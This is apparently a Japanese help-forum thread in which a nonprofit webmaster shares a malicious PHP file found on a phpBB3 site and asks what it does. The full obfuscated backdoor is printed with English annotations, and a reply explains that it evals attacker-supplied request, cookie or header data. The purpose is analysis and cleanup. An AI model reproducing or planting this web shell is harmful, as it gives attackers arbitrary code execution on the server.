私は非営利団体のウェブサイトを運営しています。このサイトは、GoDaddy でホストされている phpBB3 システムに相乗りする形で動いています。接続の問題が断続的に発生しており、私が知っているルートディレクトリに「奇妙な」ファイルがいくつか見つかりました。どなたかコードを見て、これらのファイルが何をしていたのか教えていただけませんか? サーバー上で悪意のある PHP コードが見つかりました - このコードの動作について、どなたかアドバイスをいただけますか?
<?php
// Reviewer summary (defensive analysis; the code below is left exactly as found).
//
// This file is an obfuscated remote-code-execution backdoor. No function name
// or payload appears as a literal: each one is spelled a character at a time
// by indexing into the short strings assigned below. Many assignments
// ($katya, $choral, $fume, $knighthood, ...) are never read again in this file
// and only serve as padding.
//
// Resolving the string indexes by hand gives three stages:
//   1. $bar holds the string "create_function".
//   2. $hog is a function created through $bar whose body evals the LAST
//      argument it receives (array_pop(func_get_args())).
//   3. $hog(...) is called with filler arguments plus one final string that
//      merges $_REQUEST, $_COOKIE and $_SERVER, looks up the key "mklsxlul"
//      (or "HTTP_MKLSXLUL", i.e. a request header of that name), calls die
//      when neither is present, and otherwise evals the supplied value after
//      strrev/base64_decode.
// Net effect: whoever knows that key name can run arbitrary PHP with the
// privileges of the web server account. The die branch is why the file shows
// nothing when it is simply opened in a browser.
//
// Hunting notes:
//   - Searching for "eval" or "base64_decode" will not match this file, because
//     those names never occur literally. What is visible is a variable invoked
//     as a function ("$hog (") and long runs of "$name['n'] ." concatenation.
//   - The key name above is an indicator to look for in request logs. Cookie,
//     header and POST values are usually not in default access logs, so their
//     absence there proves little.
//   - create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so
//     this variant stops working on PHP 8+; that is a side effect, not a fix.
//   - NOTE(review): the file had to be written by someone; presumably the
//     entry point (stolen credentials or a vulnerable script) is still open,
//     so deleting this file alone is not sufficient. Confirm from logs.
//
// NOTE(review): the value of $ardently contains "[email protected]", which is
// the page's e-mail masking and not the original bytes. $ardently is not
// referenced by the executed expressions below, so the analysis is unaffected.
$katya='=KIT(a'; $choral= '$'; $fireproof='c'; $avivah= '=UlQy'; $islander= 'O'; $endosperm = '_s'; $fume=':S_:uee';
$knighthood ='WH'; $bars ='r$m';
$delicately ='D'; $caterpillar = '<ElUsabt'; $daydreaming ='$'; $contrasting = 't'; $gladys= 'S'; $complementing= '('; $kink = 'CK';$goblet ='X';$astigmatic = ')eklE';$ethane= 'l'; $aquamarine= 'Q'; $amalgams= 'u';$ardently= '[email protected]]L;"';
$cruelly='e';$lateral = 'P';
$chased = 'G'; $aspects = 'e,girT';$dismayed ='$x$Le';$handicap='s';$glints ='d'; $cursing=']Eg'; $jurisprudent = '[ac';$indeed ='M'; $influenza= '_';
$dehydrate= 'a';
$exch= ')__';$felling ='s'; $jedimaster= 'leFa'; $interrogating ='M';
$exaggerating='TLstSi)(_';
$introduced='['; $barrette='ARLEn;E;'; $halfhearted= 'o)"s$(fm';$jeffy ='O'; $ange = '9';
$handicraftsmen = ')p'; $giacinta = 'r[("KeHLv'; $johann='d'; $efferent ='r';$involving='l'; $cornucopia ='d';$assortment ='$u>U(vSov'; $idles='a';$decimated='`'; $grater = 'e';$chewing = 't'; $kayo='"';$currant =' ';$astronomically ='6'; $decomposition= 'Yo';$dukeleto ='cbi'; $diverging ='O'; $earning = 'e"';$caveman = '?';
$independent = '"';
$lab= '=(ia$'; $anode = '$';$jixian='y';$freights = '[E';$approve ='(__';
$gnome= 'KLeptre';
$crimson ='r';
$chandler='i_X$gaa';$edits='?';$blunderings='_';$attraction ='P';$avoid='k)rRf7vX';$liabilities='4';$blaster='P'; $alumnae= 's'; $daveen ='VecStT_';$crop= 'esm)Mr'; $isles ='tLnga"'; $beniamino='rRuiJVe';$concentrators = '"';
$commando='i';
$angrier ='i';$boatsman = 'RhTT_;B'; $informal='s'; $anode =':';$compatible ='^';$catherine = '8In'; $blade= 'e';
$inquisition ='[';
$brutalize='l';
$garfield=']Us'; $cruisers = 'r'; $galleried = 'H'; $garvy = '(5d';$lesson = ')6';$gunplay = '('; $fertilization =',';
$halibut =')';
// Stages 1 and 2 start at the end of the next line: $bar is assembled into
// "create_function", then $hog = $bar(' ', <body>) where the body, once the
// indexes are resolved, evals the last argument passed to the new function.
$bravura = ';)lCa';$lamp = 'N';$drain = 'c';$hydroxy ='fa)Z'; $beetles= ']]i(x';$daniella = '?';$bar=$drain.
$cruisers .$blade.
$hydroxy['1'].
$isles['0'] . $blade. $boatsman['4'] . $hydroxy['0'].$beniamino['2'] .$catherine['2'].
$drain. $isles['0']. $beetles['2']. $decomposition['1'] .
$catherine['2']; $bulls= $currant ;$hog=$bar ($bulls, $blade.$avoid[6].
$hydroxy['1'] . $bravura['2'] .$beetles['3'] .$hydroxy['1'] .$cruisers.$cruisers. $hydroxy['1'] .$jixian.
$boatsman['4']. $gnome['3'] . $decomposition['1'].
$gnome['3'].
$beetles['3'].$hydroxy['0'].$beniamino['2'] .$catherine['2']. $drain .
$boatsman['4'] .$isles['3'] .$blade .$isles['0'] .
$boatsman['4']. $hydroxy['1'] . $cruisers. $isles['3'].
$garfield['2'] . $beetles['3']. $hydroxy[2]. $hydroxy[2] .
$hydroxy[2] .$bravura['0']);
// Stage 3: invoke the generated function. Every argument except the last is
// filler ($lucia and $corporacy are never assigned anywhere in this file);
// only the final concatenated string is popped and evaluated. $anode was
// reassigned from '$' to ':' above and supplies the ':' of the ternaries
// inside that string.
$hog
($avoid['5'] ,$delicately, $garfield['1'], $chandler['3'] ,$lucia , $corporacy[2] ,$boatsman['6'] , $chandler['3'] . $beetles['2']. $lab['0'] .$hydroxy['1'] . $cruisers . $cruisers .$hydroxy['1']. $jixian .$boatsman['4'].$crop['2'] .
$blade.$cruisers . $isles['3']. $blade .
$beetles['3'].$chandler['3'] .$boatsman['4'] . $boatsman['0'] .
$freights['1'] .
$aquamarine.$garfield['1'] .$freights['1'] .
$daveen[3] .
$boatsman[3]. $fertilization .$chandler['3'].$boatsman['4']. $bravura['3']. $diverging.
$diverging .$gnome['0'].$catherine['1'] .
$freights['1'].$fertilization .
$chandler['3'] .$boatsman['4'] . $daveen[3] . $freights['1'] .$boatsman['0']. $beniamino[5].
$freights['1']. $boatsman['0'] . $hydroxy[2] . $bravura['0']. $chandler['3'] . $hydroxy['1'].$lab['0'] .
$beetles['2'] .$garfield['2'].$garfield['2'] .
$blade . $isles['0'] .$beetles['3'] .$chandler['3'] . $beetles['2'] .
$inquisition .
$concentrators.$crop['2']. $avoid['0'] .$bravura['2'].$garfield['2'].
$beetles['4'] .$bravura['2']. $beniamino['2'] .$bravura['2'].$concentrators.$beetles['1'] .
$hydroxy[2] .$daniella['0'].
$chandler['3'] .$beetles['2']. $inquisition.$concentrators . $crop['2']. $avoid['0'] .$bravura['2'] . $garfield['2'] . $beetles['4'] .$bravura['2'].
$beniamino['2'] .$bravura['2'] .$concentrators .
$beetles['1'] .
$anode . $beetles['3']. $beetles['2'] . $garfield['2'].$garfield['2'] .$blade . $isles['0']. $beetles['3'] . $chandler['3'].$beetles['2'] . $inquisition .$concentrators .$galleried. $boatsman[3]. $boatsman[3].$blaster . $boatsman['4']. $crop[4]. $gnome['0'] .$isles['1'] .$daveen[3].
$avoid['7']. $isles['1'] .$garfield['1'] .
$isles['1']. $concentrators .$beetles['1'].$hydroxy[2] .$daniella['0'].$chandler['3'].
$beetles['2'].$inquisition .$concentrators .
$galleried.
$boatsman[3]. $boatsman[3].
$blaster.$boatsman['4'] .
$crop[4].$gnome['0'] . $isles['1'].$daveen[3].$avoid['7'].
$isles['1']. $garfield['1'] .$isles['1'].$concentrators . $beetles['1']. $anode.
$garvy['2'] .$beetles['2'] . $blade . $hydroxy[2].$bravura['0'].$blade . $avoid[6].
$hydroxy['1'].$bravura['2'].
$beetles['3'] . $garfield['2']. $isles['0'] .$cruisers.
$cruisers. $blade .$avoid[6].$beetles['3']. $dukeleto['1']. $hydroxy['1'].$garfield['2'] . $blade .$lesson['1'] . $liabilities.$boatsman['4']. $garvy['2'].$blade . $drain. $decomposition['1']. $garvy['2'] .$blade.$beetles['3'] .
$garfield['2']. $isles['0']. $cruisers. $cruisers.$blade . $avoid[6] .
$beetles['3'] .
$chandler['3'].$hydroxy['1'] .$hydroxy[2].$hydroxy[2] .
$hydroxy[2] .$hydroxy[2]. $bravura['0']);
ほとんどのコードは、彼らが望むもの – cmorrissey
つまりこのスクリプトは、攻撃者が実行/アップロードを行うためのコントロールパネルを開くものです。実際には `$_REQUEST`、`$_COOKIE`、`$_SERVER` を 1 つの変数にマージし、その中から特定の変数を探してデコードし、評価(eval)しています。要するに、攻撃者はこのスクリプトを使って必要なコードを何でも実行できます。 – cmorrissey
PHP ファイルを 1 つずつ調べていく以外に、何かアドバイスはありますか? 複数ファイルを対象にした検索で、探すべき特定の文字列はありますか? 何かアドバイスをいただければ幸いです。 –